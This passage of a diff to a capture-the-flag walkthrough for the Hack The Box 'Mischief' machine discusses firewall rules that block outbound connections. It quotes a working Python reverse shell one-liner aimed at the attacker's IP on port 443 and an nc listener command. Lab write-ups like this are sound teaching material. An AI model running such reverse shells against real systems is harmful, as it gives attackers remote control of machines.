thosearetheguise/thosearetheguise.github.io/_posts/2019-01-06-htb-Mischief.md

 loki@Mischief:~$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 ```

-Our standard reverse shell payloads and other means of connecting back to our attacking machine hang (curl, wget etc), this indicates that there is a firewall or iptable rules in place blocking our connections.
+Our standard reverse shell payloads and other means of connecting back to our attacking machine hang (`curl`, `wget` etc), this indicates that there is a firewall or iptable rules in place blocking our connections.
 There are a few things we can also test to see the bounds of the iptables rules, these include trying UDP ports or IPv6 connections.

-The default nc is not able to create an IPv6 listener.
+The default `nc` is not able to create an IPv6 listener.
 We can verify this by setting up a listener and viewing our netstat
 ```
 root@kali: nc -nlvp 443
 ...